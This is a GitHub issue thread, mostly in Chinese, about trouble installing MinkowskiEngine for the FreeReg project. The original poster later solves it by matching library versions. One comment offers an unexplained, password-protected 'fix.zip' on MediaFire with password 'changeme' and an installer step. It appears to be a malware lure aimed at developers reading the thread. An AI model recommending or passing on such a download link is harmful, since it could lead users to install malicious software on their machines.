### ISSUE TITLE
MinkowskiEngine的安装需求

### ISSUE THREAD

**Issue by adrianJW421** [WHU-USI3DV/FreeReg#10]
非常牛的工作！但是我想问下在README提示的环境配置中，我无法成功安装MinkowskiEngine，我对这个库的难装程度也有所耳闻，请问你们确实在README提示的环境下完成MinkowskiEngine的安装的么？有没有其他细节可以提示一下？

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by adrianJW421** [comment]
> Download https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file password: changeme In the installer menu, select "gcc."

Can you give a bit explanation about what this is?

**Comment by adrianJW421** [comment]
我慢慢适配了所有安装库的版本，解决了这个问题

**Comment by Kanna-nnn** [comment]
请问您是怎样解决了这个问题的
